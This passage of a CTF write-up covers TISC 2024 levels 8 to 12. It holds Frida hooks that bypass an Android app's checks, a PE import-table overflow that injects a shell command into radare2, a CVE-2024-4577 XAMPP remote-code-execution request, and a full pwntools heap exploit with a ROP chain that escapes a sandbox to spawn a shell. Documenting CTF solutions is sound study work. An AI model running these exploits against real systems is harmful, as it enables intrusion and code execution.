for (let i = 0; i < _bytes.length; i++) {
bytes.push(_bytes[i])
}

console.log(bytes.slice(4096, 4096 + 4))

let bArr3 = bytes.slice(4096, 4096 + 4)
let i3 = ByteBufferToInt(bArr3)

let bArr4 = bytes.slice(4100, 4100 + i3)
let bArr2 = bytes.slice(4100 + i3, 4100 + i3 + 128)
let c0289q1 = new C0289q1(bArr2)
let bArr5 = []
let i4 = 0
let i5 = 0

for (let i2 = 0; i2 < i3; i2++) {
i4 = (i4 + 1) & 255
let bArr6 = c0289q1.c
let b2 = bArr6[i4]
i5 = (i5 + (b2 & 255)) & 255
bArr6[i4] = bArr6[i5]
bArr6[i5] = b2
bArr5[i2] = bArr6[(bArr6[i4] + b2) & 255] ^ bArr4[i2]
}

let result = []
for (var i = 0; i < bArr5.length; ++i) {
result.push(bArr5[i] & 0xff)
}

On logging the result, we can convert it from the byte array into a binary in Python and obtain a decrypted .dex file! (PALINDROME is really sneaky)

Opening the new .dex file in JADX, we see a few more clues:

  1. Entering “I am a tomb” into the MainActivity input pwill generate a .so native library and load it into the application. (“I am a tomb” - the scene where Blue Space encounters the 4D spaceship about to be 3-dimensionalized)
  2. “Only Advance” will trigger a function from the native library to generate the IV and key for flag decryption. (“Only Advance” - Wade when sending Tianming’s brain to the First Trisolaran Fleet)

However, when we enter in the 2 inputs, in the logs, we see that we need to patch the binary to bypass certain checks. In Frida, we can hook onto System.load, just before the native library is deleted, so we can extract it from the device’s filesystem and reverse/patch it.

System.load.implementation = function(library) {
if (library.endsWith("libnative.so")) {
console.log("loaded patched binary")
let file = File.$new("/data/user/0/com.wall.facer/files/libnative.so")
let fileOutputStream = FileOutputStream.$new(file)
fileOutputStream.write(Base64.decode(libnative, 0))
this.load.call(this, file.getAbsolutePath())
} else {
this.load.call(this, library)
}
}

The following part was really painful to reverse and patch. There are 3 checks that we need to bypass:

  1. “I need a very specific file to be available”: /sys/wall/facer file needs to exist. Unfortunately, we cannot create the file normally, but we can patch the binary to change it to check for some other file, like /etc/passwd.
  2. I don’t even know what the next function checks, but we can patch the value of RAX used in the jumptable so that we jump to the “Input verification success” part instead of the “hahaha” part.
  3. “Bet you can’t fix the correct constant”: I also don’t know what’s going on here, but we can just patch the binary to set the RAX value to jump to not the “I’m afraid I’m going to have to stop you” part

After all the patches were done, we can technically hook onto System.load and replace the library in the filesystem with the patched one. However, I couldn’t get it to work properly, so I patched the loaded library in-memory instead.

Log.i.overload("java.lang.String", "java.lang.String").implementation = function(tag, msg) {
if (tag == "TISC" && msg == "Native library loaded!") {
console.log("patching memory")

let libnativeModule = Process.enumerateModulesSync().filter(m => m.name == "libnative.so")[0]
console.log(JSON.stringify(libnativeModule))
let base = parseInt(libnativeModule.base, 16)
console.log("base: ", base.toString(16))

// make whole module writable
Memory.protect(ptr(base), libnativeModule.size, "rwx")

// change file from "/sys/wall/facer" to "/data/aaaaaaaaa"
let file = Array.from("/etc/passwd\x00").map(c => c.charCodeAt(0))
// Memory.writeByteArray(ptr(base + 0x3AB0), file)
Memory.writeByteArray(ptr(base + 0x5AB0), file)

// patch hahaha function to set eax to 1
// mov eax, 1; nop
Memory.writeByteArray(ptr(base + 0x3454), [0xb8, 0x01, 0x00, 0x00, 0x00, 0x90])

// mov eax, 0; nop
Memory.writeByteArray(ptr(base + 0x35f1), [0xb8, 0x01, 0x00, 0x00, 0x00, 0x90])

// mov [rbp+var_24], 0x10
Memory.writeByteArray(ptr(base + 0x3614), [0x10])
}
this.i.call(this, tag, msg)
return 0
}

After that, we pass all the checks, it spits out the key and IV, and we can put it in the app to get the flag:

TISC{1_4m_y0ur_w4llbr34k3r_!i#Leb}

Imphash (Level 09)

Almost there agent, we might have a chance to gain access into the enemy’s systems again!! We are so close.

But, it seems like they’ve developed a robust anti-malware service that’s thwarting all attempts to breach their systems!

We’ve found this import hashing plugin which is a key component of their malware analysis pipeline. Agent, can you find a way around it?

In this challenge, PALINDROME is using a radare2 plugin to output a hash of all the imports of a binary (this is a common malware analysis technique). It takes in a Portable Executable (PE) file and parses the imports to generate a hash. This site was really useful to learn about how the PE format encodes the import tables. Basically, there are 3 tables involved - a table of library entries, a table of library names, and a table of function entries. The library entry table is the main table that is parsed by radare2 to determine the PE’s imports. This table has several fields, including OriginalFirstThunk and Name. OriginalFirstThunk points to the start of a null-terminated table of function entries, where each entry is a pointer to the name of the function (there’s another value before the name of the function that isn’t important for our exploit). The Name field simply points to the address of the library name. Note, however, that these addresses are RVA addresses - their physical addresses which we can see in a hex editor are not the same as the value we should be putting in, but offset by a certain amount. I compiled a test PE file with a few imports to determine the fixed offset, and from there added the offset to each of my desired entries.

(I attempted to use the python lief library to generate a PE file with arbitrary imports, but it wasn’t working very well. There was also a C# library that could do the same but I was too lazy to setup a C# environment just for the challenge. In the end, I manually crafted my exploit using HxD, so I won’t have an exploit script for this challenge, just an overview of what I did during the CTF.)

Taking a look in IDA, we can see how this plugin works - it appends all the imports and library names into a really long string, then hashes the entire string to get a unique hash for the set of imported functions. However, we can see that the index which keeps track of the end of the string during the appending process might possibly overflow here:

if ( 4094LL - idx < (unsigned __int64)(libname_without_extension_len + name_len) ) // can possibly overflow
{
puts("Imports too long!");
return 1LL;
}
for ( j = 0; j < libname_without_extension_len; ++j )
formatted_name_to_hash[idx + j] = tolower(also_libname[j]);
formatted_name_to_hash[idx++] = '.';
for ( k = 0; k < name_len; ++k )
formatted_name_to_hash[idx + k] = tolower(also_name[k]);
idx += name_len; // +1056
formatted_name_to_hash[idx++] = ',';

Even though the remaining space left on the string is checked against the total length of the library name and function name, the actual number of characters appended is 2 more than the value specified, one for the dot and one for the comma. So, if the total length of index + library_name + function_name is less than 4094, but the actual total length is 4096, then we can overflow the index and do a array out of bounds. With this out of bounds, we can immediately modify name_len and libname_without_extension_len, which are used to change the value of idx. Hence, we can almost arbitrarily control idx now.

char formatted_name_to_hash[4110]; // [rsp+182h] [rbp-109Eh] BYREF
int name_len; // [rsp+1190h] [rbp-90h]
int libname_without_extension_len; // [rsp+1194h] [rbp-8Ch]

The maximum lengths of the function name and library name are both 255 bytes, since radare2 truncates the remaining string. We can easily circumvent this by doing manual calculations on how many such entries we need to approach the overflow value, and once we’re near enough, using a smaller entry to get the index to point outside the array.

In the appending code above, we can see that libname gets appended first before function name is appended. So, we can use libname to OOB into name_len, and then subsequently, when the program reads name_len, we can use name to control the value of idx to point to wherever we want.

After controlling idx, where should we point it to? If we scroll up to the beginning of the function, we can see this happening:

strcpy(echo, "echo ");
strcpy(out, " > out");

So the command that generates the import hash is actually a radare2 command that is hardcoded into the binary, but placed on the stack.

During exploitation I faced an issue with encoding (0xff would be encoded to 0xc0ff in UTF-8), so my index ended up pointing somewhere else. I verified this by launching radare in GDB so I could see the exact value of the index after the overwrite.

I was too lazy to fix this properly, so after overwriting index, I just added enough entries to increment index back to the desired value. Even though it probably overwrote something important higher up in the stack it doesn’t matter once we manage to replace echo with our desired flag command:

echo                                 ;  cp /app/flag.txt out;

The whitespace is so our hash doesn’t interfere with the payload. After parsing this file, remote returns us the flag:

TISC{pwn1n6_w17h_w1nd0w5_p3}

Diffuse (Level 10)

!!! We’ve found a weird device with a timer counting down! Ccould..it… be…a bomb….?? Your fellow agents found some access into the engineer’s machine, will you be able to find some clues and diffuse it before it’s too late?

For details on your instance, talk to @DiffuseInstanceBot on Telegram.

Note: Instances may be refreshed periodically. Remember to save your work outside of the instance!

This challenge was the most painful and guessy challenge in the CTF (yes, even more guessy than the Level 01 OSINT). I don’t think I enjoyed this challenge very much at all, especially given the last part is quite intense RE which I already dislike.

We start off in a Windows SSH machine as the diffuser user, with a lot of red herrings left around in the desktop. There’s also a diffuse user which we don’t have access to. After trying some commands, we might realize that there’s a web server running on the machine on port 80. We can curl this server and observe that it seems to be running XAMPP v8.1.25, which a quick Google search will show that it’s vulnerable to https://github.com/AlperenY-cs/CVE-2024-4577. We can trigger this RCE exploit in Poowershell as such:

irm 
-Method post
-ContentType "application/x-www-form-urlencoded"
-Body '<?php echo system("dir"); die(); ?>' "http://localhost/submit.php?%ADd+allow_url_include%3d1+%ADd+auto_%70%72%65%70%65%6e%64_file%3dphp://input"

The XAMPP user seems to have all admin privileges, so we can change the password of the diffuse user and SSH as that user instead. In this new desktop, we find a few interesting files, particularly the firmware for a certain bomb device.

Reversing this firmware was really quite a pain. It uses the XTENSA architecture, which IDA doesn’t have decompilation support for, and Ghidra’s decomp for it was quite trash. In fact, for this challenge, I found dynamic reversing a lot more useful than static, but we’ll visit that later. First, we need to figure out how to actually run the firmware.

In the user’s desktop, there are also some photos of the bomb device, including the Arduino board used to run the firmware. We can see from the board that the processor is atmega328p, and we can download an IDA configuration for this processor type from here.

Annoyingly, the schematic for the bomb was hidden in another folder in AppData/Roaming, and I only found the schematic.pdf file after looking through almost literally everything, and stumbling on the backup history for Notepad++, which the challenge author probably used to setup the original instance. There I saw the setup.ps1 file which points me to the schematic.pdf file.

Because I didn’t have the schematic initially, I tried using a variety of simulation software, such as simavr and AVR Simulator, all to no avail. Why? Because my assumptions about how the bomb worked, based on the fake image of the bomb provided in the folder, were wrong. I even tried to replicate the wiring of the bomb using eye power and the image, but nothing was showing up on the simulated LCD. Frustrated, I decided to take a break and wait for Gerrard to solve the challenge first, while I went to do my ever-growing pile of long-overdue schoolwork.


After Gerrard solved this challenge, I came back to take another look at the windows VM provided, and finally found the schematic.pdf file. This schematic was completely different from the provided image:

  1. The LCD display was completely different - in the image, it was a Hitachi HD44780 LCD, the most common LCD display on the market. However, the schematic suggested the LCD used was wokwi-lcd1602-i2c - not only is the LCD chip different (PCF8574T rather than HD44780), the protocol used is also different (I2C instead of standard).
  2. The image showed that the bomb had 2 input buttons - but in the schematic, the bomb is connected to a keypad instead.
  3. The image didn’t have the 7segment component, while the schematic had it.

Not only that, the PDF had a hidden page - on the second page was the secret key which we were meant to embed in the chip. The only hint towards this was the “Page 1 of 2” on the bottom of the PDF - such a small hint for a crucial detail.

(After solving the challenge, I realized that the A0/A1 pins also have a small “rng” label on it - apparently this was supposed to inform participants that we were supposed to connect a component here to control a certain RNG value, which we’ll look into later.)

Enough ranting - at least this meant I was actually making some progress. As the schematic components were labelled according to their IDs in the Wokwi simulation software, it was really useful for solving the last part of this challenge.

After setting up the wiring of the device as shown in the schematic, it was finally time to run the bomb firmware. On uploading the firmware and running it, we see some output from the LCD screen. However, entering the bomb code which we found in the firmware - 39AB41D072C - doesn’t defuse the bomb, but complains about a wrong decryption key. This is where the chip in the schematic comes in. Unfortunately, there was no indication as to what we were meant to do with the chip, other than that it should provide the decryption key. To make things worse, the Arduino would send a certain output to the chip to initialize the UART connection and poll to receive characters, which misled me into thinking we were supposed to do something with the received string. The most unlucky of all - the received string, when XORed against the entire decryption key found in the PDF, gives a string comprising of entirely printable characters, which made me think I was on the right track. Unfortunately, I was getting further from the solution.

At the same time, I started doing some dynamic analysis on the firmware. The XTENSA architecture was quite interesting - it had 32 8-bit registers, yet it operated on 16-bit values, so 1 value is usually represented by 2 registers. This is especially true for the X, Y, and Z registers, aliases for r27:r28, r29:r30, and r31:r32 respectively. In addition, the writable regions are stored completely separately from the code region (something called the Harvard architecture), so a memory address such as 0x37a can’t be properly resolved in IDA, since it also corresponds to a code address. GDB, which is based on von Neumann architectures, addresses this issue by offsetting the RAM region by a fixed offset 0x800000, and resolving the references to these addresses accordingly, so we need to add this value to the addresses we see in the disassembly if we wish to view it in GDB.

I soon figured that at some point between inputting the code and printing the error message, certain strings, including my decryption key, were being XORed against a single byte key. By setting this value to 0x00 and then checking the unchanged input strings, I found that the key 0xe8 would actually decrypt the last string to TISC{ - and then the decryption afterwards fails. I spent another painful day tracing this value all the way from its source - an instruction that reads a 16-bit value from the ADC register. This register, apparently, is controlled by the A0/A1 pins on the Arduino, The series of operations performed on the value obtained from this register is quite complex in assembly, but less so in Python:

def cool_func(val):
value = val
for i in range(0x20):
value *= 2
if value > 0xffffffffff:
value -= 0xff00000000
# else:
# value += 1
# print(hex(value))
return value

for i in range(1023):
val = cool_func(i) >> 32
val = cool_func(val * 0x41a7) >> 32
if val == 0xe8:
print(i, hex(val))

This script will generate some possible values of the ADC register that will result in a decryption key of 0xe8. After running this script, we notice a few values like 1, 256 etc will work. Following this, I tried a few combinations of output from the chip with the secret key - sending back the string we received, XORing each respective byte of the received string and the secret key, and finally sending just the secret key - which worked perfectly. The LCD then tells us that the flag is found in the I2C bus. Looking at where I first saw the flag format, I realized the flag was no longer there. At this point, it was 3am and I was really tired of this challenge, so I just searched through memory for the flag format and found the flag at 0x80034d.

TISC{h3y_Lo0k_1_m4d3_My_0wn_h4rdw4r3_t0k3n!}

Sandboxed Notes App (Level 11)

All thanks to you agent, we are now safe from that bomb threat, and we’re also in their systems now!

We’ve gained access to a server used to store notes by the enemy. It looks to be designed by a rookie, so it can’t be that hard to find an entry. Unfortunately, it seems that they are one step ahead of us, and deployed a cutting edge sandbox by Microsoft around the notes app. Can you break through it and give us more clues on who is behind all of these attacks?

This challenge was a really interesting sandbox escape challenge - when I’m free after my exams, I’ll go into more detail for the writeup.

Reading the source for the sandbox, it seems that there are 3 different heap allocators in use.

  1. Regular malloc - this is used by the parent as per normal, such as for the feedback chunk
  2. snmalloc page allocator - this is the large object allocator used by the parent to allocate memory regions for the child’s heap
  3. snmalloc small object allocator - this is used by the child

We need to start from the bottom and work our way up, to exploit the regular malloc and get RCE.

Debugging this challenge was slightly difficult because of the forked process - if we wish to debug the parent, we should attach at the very start using gdb.debug; otherwise, we should gdb.attach after the desired child process has been spawned. Every time we exit the inner loop, the child process will be killed, so our debugging session won’t remain active. Therefore, we need to attach at the right child process to prevent this from happening. Now, let’s get to the exploit!

The first vulnerability is easy to spot - there is use after free on the deleted notes since the array entry isn’t cleared. We can even edit the freed chunk from edit_note. In GDB, we can see that the chunks hold the metadata for the next chunk to be loaded into the allocator. However, the allocator is LIFO, and so overwriting the metadata of a currently freed chunk doesn’t do anything until the allocator runs out of free chunks, and wraps around to our previously freed chunks.

We can do a simple heap feng shui to align our heap such that new allocations of content chunks will fall onto the previously allocated and freed note chunks. This way, we can arbitrarily control the note struct as shown:

struct note {
size_t size;
void* (*printfn)(struct note *);
char *contents;
};

Firstly, we should want to leak some heap values from the sandboxed process. We can increase the size to view more cool stuff when calling printfn.

Secondly, we want a libc leak. We can change the contents pointer to point to known regions such as the GOT, and read the addresses of the resolved functions to leak libc.

Thirdly, we want a libsandboxed.so leak as well, which we can leak from custom overrides for functions like malloc.

Fourthly, since we have libc leak, we can overwrite the entry of a more insignificant function like malloc, and set it to call a function of our choice. A good target to call is try_alloc and try_dealloc, which we can use to pivot from from the small allocator to the large one.

In the large allocator, we see that metadata is now stored on the parent, so we can’t edit it. However, with try_alloc, we can allocate arbitrary of large-size objects, which we may be able to exploit. These objects are passed through a delete somewhere in the code, and we can follow the patched code to see the conditions for a page’s metadata be freed, following which we can pass in arbitrary pointers to free. I’ll go into more detail about this soon.

After getting arbitrary free, I didn’t have a very good structure to UAF, so I just freed the feedback struct. On creating another sandbox, a lot of chunks will be allocated. Doing some heap feng shui, we can make sure that the object which allocates into our feedback chunk has a pointer that points to some region before our feedback chunk. That way, we can overwrite the pointer once to get 1 arbitrary write.

However, it turns out that the chunk which is allocated into the feedback chunk is some strange struct that has a pointer 0xa00 bytes before our feedback chunk. If we were to spam null bytes into the extremely large region between the two, the program would most definitely crash when trying to use the heap again later on by freeing stuff. So, we need to first leak the values, then replace all the values verbatim up to the feedback pointer, which we set to our arbitrary write location. In fact, even after doing this, I still struggled with exiting normally via the interface, because the heap was already corrupted when we created fake chunks for the heap feng shui to control what struct was allocated into our feedback chunk. We’ll deal with this later, since this means our final exploit needs to exit abnormally instead of through the provided interface.

In this case, I want to do a House of Apple, but I still lack a libc leak in the parent. This means I actually need to overwrite the feedback pointer twice - once to leak libc, and once to overwrite the stderr file struct (there aren’t any unsorted chunks within the leaked region). Since our primitive right now only allows for 1 arbitrary write, we need to be clever with this to work around this limitation. In the end, I decided to set the feedback content pointer to the write GOT entry so we can leak it, then overwrite it to exit. Then, since the GOT is above the global pointer to the feedback chunk, we can also overwrite this, and fake another feedback chunk in the same region to initiate our second arbitrary write. This time, we will overwrite stderr with the required House of Apple values to get RCE and our flag!

Sorry if this writeup was a bit incoherent - I’m really sleepy right now and rushing out the writeup for the submission which I’m late for already, so it’s a complete mess. I’ll clean it up when I have the time to. Here’s my final exploit script:

#!/usr/bin/env python3

from pwn import *

exe = ELF("./chall")
sandboxed = ELF("./sandboxedlib.so")
library_runner = ELF("./library_runner")
if args.LOCAL and not args.DOCKER:
lib = ELF("/usr/lib/libc.so.6")
lib2 = ELF("/usr/lib/libc.so.6")
else:
lib = ELF("./lib/libc.so.6")
lib2 = ELF("./lib/libc.so.6")

context.binary = exe
context.aslr = True

def exit_funcs_encrypt(val: int, key: int):
r_bits = 0x11
max_bits = 64
enc = val ^ key
return (enc << r_bits % max_bits) & (2 ** max_bits - 1) | ((enc & (2 ** max_bits - 1)) >> (max_bits - (r_bits % max_bits)))

def exit_funcs_decrypt(val: int, key: int):
r_bits = 0x11
rotated = (2**64-1)&(val>>r_bits|val<<(64-r_bits))
return rotated ^ key

def fastbin_encrypt(pos: int, ptr: int):
return (pos >> 12) ^ ptr

def fastbin_decrypt(val: int):
mask = 0xfff << 52
while mask:
v = val & mask
val ^= (v >> 12)
mask >>= 12
return val

def add_note(idx, size, data):
p.sendlineafter(b">", b"1")
p.sendlineafter(b"Enter index of note:", str(idx).encode())
p.sendlineafter(b"Enter size of note:", str(size).encode())
p.sendafter(b"Enter note content:", data)

def free_note(idx):
p.sendlineafter(b">", b"2")
p.sendlineafter(b"Enter index of note:", str(idx).encode())

def edit_note(idx, data):
p.sendlineafter(b">", b"3")
p.sendlineafter(b"Enter index of note:", str(idx).encode())
p.sendafter(b"Enter note content:", data)

def view_note(idx):
p.sendlineafter(b">", b"4")
p.sendlineafter(b"Enter index of note:", str(idx).encode())
return p.recvuntil(b"Operation success", drop=True)[1:]

def get_feedback(data):
p.sendlineafter(b">", b"5")
p.sendafter(b"Please provide your feedback", data)

def view_feedback(amt):
p.sendlineafter(b">", b"6")
p.recvuntil(b"Your feedback: ")
ret = p.recv(amt)
p.recvuntil(b"Operation success")
return ret

if args.DOCKER:
context(terminal=['tmux', 'split-window', '-h'])

if args.NOGDB:
p = process([exe.path], env = { "LD_PRELOAD": "./libsandbox.so" })
if args.GDB:
p = gdb.debug([exe.path], env = { "LD_PRELOAD": "./libsandbox.so" })
elif args.LOCAL:
p = process([exe.path], env = { "LD_PRELOAD": "./libsandbox.so" })
else:
p = remote("chals.tisc24.ctf.sg", 28190)
# p = remote("localhost", 5000)

# good luck pwning :)

for i in range(254):
add_note(3, 0x20, p64(i))

p.sendlineafter(b">", b"7")

p.sendlineafter(b">", b"1")
get_feedback(b"\x00")
add_note(0, 0x20, b"\x00")
if args.LOCAL and not args.DOCKER:
add_note(1, 0x20, b"\x00")
add_note(2, 0x100, b"\x00")

free_note(0)
if args.LOCAL and not args.DOCKER:
free_note(1)

add_note(3, 0x20, p64(0))
free_note(3)

if args.LOCAL and not args.DOCKER:
for i in range(252):
add_note(3, 0x20, p64(i))
# for i in range(248):
# add_note(3, 0x20, p64(i))
else:
for i in range(254):
add_note(3, 0x20, p64(i))

payload = flat(
0x100,
)
edit_note(3, payload)

leak = view_note(0)
print_note = u64(leak[8:16])
sandboxed.address = u64(leak[8:16]) - 0xa8c3
# sandboxed.address = u64(leak[8:16]) - 0x9d39
heap = u64(leak[16:24])
print(hex(sandboxed.address))
print(hex(heap))

payload = flat(
0x100, print_note,
sandboxed.got.printf
)
edit_note(3, payload)

leak = view_note(0)
lib.address = u64(leak[:8]) - lib.sym.printf
print(hex(lib.address))

payload = flat(
0x100, print_note,
sandboxed.got.malloc
# lib.address + 0x54c2e0
# lib.address + 0x515000
)
edit_note(3, payload)

leak = view_note(0)
library_runner.address = u64(leak[:8]) - library_runner.sym.malloc
print(hex(library_runner.address))

# AllocChunk: _ZN7sandbox21MemoryServiceProvider3runEv+450
# DeallocChunk: _ZN7sandbox21MemoryServiceProvider3runEv+840
# 0x155554e29c78
try_alloc = sandboxed.address + 0x0000a7c1
try_dealloc = sandboxed.address + 0x0000a72c

# edit_note+162
# 0x00007ffff7fb2c00

if args.LOCAL and not args.DOCKER:
stack_target = heap + 0x7ef368
else:
stack_target = heap + 0x7ef3a8
payload = flat(
0x100, print_note,
stack_target
)
edit_note(3, payload)

leak = view_feedback(460)
actual_heap = u64(leak[0xb8:0xc0])
print(hex(actual_heap))
feedback_chunk = actual_heap - 0xc0
print(hex(feedback_chunk))

payload = flat(
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x31,
0x0, 0x0,
0x0, 0x31,
0x0, 0x0,
0x0, 0x51,
0x0, 0x0,
0x0, 0x51,
0x0, 0x0,
0x0, 0x1f1,
0x0, 0x0,
0x0, 0x1f1,
)
get_feedback(payload)

# feedback_chunk = 0xdeadbeef

# struct of MetaBaseEntry:
# 0x00: meta -> we want to free this arbitrary pointer
# 0x08: rax -> we need to manipulate this to pass the checks

pop_rdi = library_runner.address + 0x000000000004a2d9
pop_rsi_rbp = library_runner.address + 0x0000000000031c83
pop_rsp_rbp = library_runner.address + 0x000000000002cbab
pop_rdx = library_runner.address + 0x000000000004a4b2 # pop rdx ; and dh, bh ; dec ecx ; ret
pop_rbx_r12 = library_runner.address + 0x0000000000051a56
if args.LOCAL and not args.DOCKER:
return_to = heap + 0x7ef3f0 # above (sandbox::ExportedFunction<bool>::operator()(void*)+102) in gdb
else:
return_to = heap + 0x7ef450 # above (sandbox::ExportedFunction<bool>::operator()(void*)+102) in gdb

for i in range(7):
payload = flat(
pop_rdi + 1,
pop_rdi, 0x4000,
pop_rsi_rbp,
feedback_chunk + 0x10 + 0x20 * (i + 1),
heap + 0x7ef380, # saved rbp from gdb
pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
pop_rdx, 0x800,
try_alloc,
pop_rsp_rbp, return_to
)
edit_note(0, payload)

payload = flat(
pop_rdi + 1,
pop_rdi, 0x4000,
pop_rsi_rbp,
feedback_chunk,
heap + 0x7ef380, # saved rbp from gdb
pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
pop_rdx, 0x800,
try_alloc,
pop_rsp_rbp, return_to
)
edit_note(0, payload)

payload = flat(
pop_rdi + 1,
pop_rdi, 0x4000,
pop_rsi_rbp,
feedback_chunk - 0x1e0,
heap + 0x7ef380, # saved rbp from gdb
pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
pop_rdx, 0x800,
try_alloc,
pop_rsp_rbp, return_to
)
payload = flat(
pop_rdi + 1,
pop_rdi, 0x4000,
pop_rsi_rbp,
feedback_chunk - 0x850,
heap + 0x7ef380, # saved rbp from gdb
pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
pop_rdx, 0x800,
try_alloc,
pop_rsp_rbp, return_to
)
edit_note(0, payload)

# payload = flat(
# pop_rdi + 1,
# pop_rdi, 0x4000,
# pop_rsi_rbp,
# feedback_chunk - 0xc0,
# heap + 0x7ef380, # saved rbp from gdb
# pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
# pop_rdx, 0x800,
# try_alloc,
# pop_rsp_rbp, return_to
# )
# edit_note(0, payload)

# payload = flat(
# pop_rdi + 1,
# pop_rdi, 0x4000,
# pop_rsi_rbp,
# feedback_chunk,
# heap + 0x7ef380, # saved rbp from gdb
# pop_rbx_r12, 0xfffffffffffffff, 0xdeadbeef,
# pop_rdx, 0x800,
# try_alloc,
# pop_rsp_rbp, return_to
# )
# edit_note(0, payload)

# p.sendlineafter(b">", b"3")
# p.sendlineafter(b"Enter index of note:", b"0")


p.sendlineafter(b">", b"7")

p.sendlineafter(b">", b"1")


if args.LOCAL and not args.GDB and not args.NOGDB:
gdb.attach(p,
# gdbscript="""
# b *_ZN7sandbox21MemoryServiceProvider3runEv+450
# b *_ZN7sandbox21MemoryServiceProvider3runEv+840
# """
# b *_ZN7sandbox21MemoryServiceProvider3runEv+450
# b *'sandbox::Library::~Library()'+218
# gdbscript="""
# b *'sandbox::Library::~Library'+397
# """
)
pause()

# leak = view_feedback(0xa00)
# print(hex(len(leak)))
# print("leak:")
# for i in range(0xa00 // 8):
# print(hex(u64(leak[i*8:i*8+8])))
#
# lib2.address = u64(leak[0x110:0x118]) - 0x57b6d8
# print(hex(lib2.address))

# one_gadgets = [
# 0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43
# ]
# payload = b"\x00" * 0xa00
# payload += p64(lib2.got.free)
# get_feedback(payload)
# get_feedback(p64(lib2.address + one_gadgets[3]))
# get_feedback(p64(lib2.address + one_gadgets[2]))

# payload = leak
payload = b"\x00" * 0xa00
payload += flat(
exe.got.write,
)
get_feedback(payload)
sleep(0.3)
leak = view_feedback(0x150)
print(hex(len(leak)))
print("leak:")
for i in range(0x150 // 8):
print(hex(u64(leak[i*8:i*8+8])))

lib2.address = u64(leak[:0x8]) - lib2.sym.write
print(hex(lib2.address))

payload = p64(lib2.sym.exit)
# payload = leak[:8]
payload += leak[8:0x118]
payload += flat(
0x40b188
)
payload += leak[len(payload):]
payload += flat(
lib2.address + 0x21b6a0, 0x300,
)
payload += p64(lib2.sym.system)
payload += flat(
{
0x18: 0x0,
0x30: 0x0,
0xe0: 0x40b198 - 0x68,
},
filler=b"\x00"
)
get_feedback(payload)

payload = flat(
{
0x0: b" sh".ljust(8, b"\x00"),
0x20: 0x0,
0x28: 0x1,
0xa0: 0x40b1a0,
0xc0: 0x0,
0xd8: lib2.address + 0x2170c0
},
filler=b"\x00"
)
get_feedback(payload)

p.interactive()

# TISC{35c4p3_fr0m_pr150n_r34lm}

Revenge of the Dragon (Level 12) - Upsolve

All your investigations have led you to this place: a desolate hut, abandoned and hidden deep within the forest.

As you push open the creaking door, the musty air hints at recent activity. Scattered belongings and half-burnt logs in the fireplace suggest someone left in a hurry.

In the dim light, you spot a flickering screen on a dusty table — a computer, still running. On the display, a game title flashes ominously: “Revenge of the Dragon.”

We know this is it. If we solve this we solve it all – can you break in and find out who is behind these attacks?

TBD

TLDR I had local exploit working, but it didn’t work on remote for a number of reasons. Still my 2nd favourite chall after Level 11 tho!

Comments